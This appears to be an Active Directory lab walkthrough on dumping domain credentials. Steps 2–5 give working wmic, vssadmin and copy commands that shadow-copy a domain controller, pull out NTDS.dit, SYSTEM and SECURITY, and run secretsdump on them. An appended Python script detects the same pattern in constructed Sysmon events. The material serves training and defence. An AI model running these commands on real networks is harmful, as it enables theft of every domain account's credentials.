Vssadmin Shadow Copy
Configuring
No need to configure anything.
Attacking
How it works
With Domain Admin credentials it is possible to copy the NTDS.dit file and the SYSTEM and SECURITY registry hives remotely from the Domain Controller by taking a Volume Shadow Copy, which bypasses the locks on the live files.
Tools
Executing the attack
The attack requires Domain Admin credentials and is a post-exploitation technique used to extract credentials.
1. Log in to WS01 as a normal user, for example Richard with the password Sample123.
2. Open PowerShell and execute the following command to create a shadow copy of the C: disk on dc02 with the vssadmin utility.
wmic /node:dc02 /user:administrator@amsterdam.bank.local /password:'Welcome01!' process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
3. Now we can copy the NTDS.dit file and the SYSTEM and SECURITY hives out of the shadow copy to the C:\temp directory on dc02.
wmic /node:dc02 /user:administrator@amsterdam.bank.local /password:'Welcome01!' process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY c:\temp\"
4. The next step is to map the C:\temp directory on dc02 as a drive and access the files:
$creds = Get-Credential
New-PSDrive -Credential $creds -Name j \\dc02\c$\temp -PSProvider FileSystem
cd \\dc02\c$\temp

5. Copy the files to your Kali machine and execute the following command to extract the credentials.
python3 /opt/impacket/examples/secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit local
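Added example for the Defending side (not part of the original lab page or of any referenced tool): Python detection logic run over constructed Sysmon Event ID 1 (process creation) records modelled on the commands in the walkthrough above. It flags the vssadmin create shadow invocation, a read of NTDS.dit/SYSTEM/SECURITY from a HarddiskVolumeShadowCopy device path, and WmiPrvSE.exe as parent process (a process started through WMI, as wmic process call create does), then correlates both on the same host. The record field names are an assumption.

```python
import re
from collections import defaultdict

# Constructed Sysmon Event ID 1 records modelled on the walkthrough's commands.
# Field names are assumed; this is not real telemetry.
SAMPLE_EVENTS = [
    {"host": "DC02", "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": "cmd /c vssadmin create shadow /for=C: 2>&1"},
    {"host": "DC02", "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp\ntds.dit"},
    # Benign: a backup agent listing existing shadow copies on a workstation.
    {"host": "WS01", "parent_image": r"C:\Program Files\Backup\agent.exe",
     "command_line": "vssadmin list shadows"},
]

SHADOW_CREATE = re.compile(r"vssadmin(\.exe)?\s+create\s+shadow", re.I)
SHADOW_DEVICE = re.compile(r"HarddiskVolumeShadowCopy\d+", re.I)
# The three files secretsdump needs: the AD database and the two registry hives.
CRED_STORES = re.compile(r"\\(NTDS\\NTDS\.dit|config\\SYSTEM|config\\SECURITY)\b", re.I)

def analyze_event(ev):
    """Return a finding dict for one process-creation event, or None if clean."""
    cmd = ev["command_line"]
    tags = []
    if SHADOW_CREATE.search(cmd):
        tags.append("shadow_copy_created")
    if SHADOW_DEVICE.search(cmd) and CRED_STORES.search(cmd):
        tags.append("cred_store_read_from_shadow")
    if not tags:
        return None
    # WmiPrvSE.exe as parent: the process was launched via WMI (wmic process
    # call create), i.e. from another host, as in the walkthrough.
    remote = ev["parent_image"].lower().endswith("wmiprvse.exe")
    high = remote or "cred_store_read_from_shadow" in tags
    return {"host": ev["host"], "tags": tags, "remote_wmi": remote,
            "severity": "high" if high else "medium"}

def detect(events):
    """Per-event findings plus per-host correlation: a shadow copy creation and
    a read of NTDS.dit/SYSTEM/SECURITY from it on one host is the full chain."""
    findings = [f for f in map(analyze_event, events) if f]
    tags_by_host = defaultdict(set)
    for f in findings:
        tags_by_host[f["host"]].update(f["tags"])
    chains = sorted(h for h, t in tags_by_host.items()
                    if {"shadow_copy_created", "cred_store_read_from_shadow"} <= t)
    return findings, chains

if __name__ == "__main__":
    findings, chains = detect(SAMPLE_EVENTS)
    for f in findings:
        print(f)
    print("full credential-dump chain on:", chains)
```

Running it on the constructed records yields two high-severity findings on DC02 and none for the benign vssadmin list shadows on WS01.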

Defending
Recommendations
Detection
References